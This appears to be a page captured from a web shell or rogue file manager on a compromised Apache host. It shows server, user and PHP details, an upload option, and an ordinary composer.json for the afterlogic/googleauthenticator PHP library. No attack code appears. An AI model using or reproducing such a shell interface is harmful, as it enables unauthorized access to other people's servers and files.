HEX
Server: Apache
System: Linux 185.122.168.184.host.secureserver.net 5.14.0-570.60.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Nov 5 05:00:59 EST 2025 x86_64
User: barbeatleanalyti (1024)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: /home/barbeatleanalyti/www/public_html/webmail/vendor/afterlogic/googleauthenticator/composer.json
{
    "name": "afterlogic/googleauthenticator",
    "description": "Google Authenticator 2-factor authentication",
    "version": "1.0.2",
    "type": "library",
    "keywords": ["GoogleAuthenticator", "TOTP", "rfc6238"],
    "license": "BSD-4-Clause",
    "authors": [
        {
            "name": "Michael Kliewe",
            "email": "info@phpgangsta.de",
            "homepage": "http://www.phpgangsta.de/",
            "role": "Developer"
        }
    ],
    "support": {
        "source": "https://github.com/PHPGangsta/GoogleAuthenticator",
        "issues": "https://github.com/PHPGangsta/GoogleAuthenticator/issues"
    },
    "require": {
        "php": ">=5.3"
    },
	"autoload": {
		"classmap": ["PHPGangsta/GoogleAuthenticator.php"]
	}
}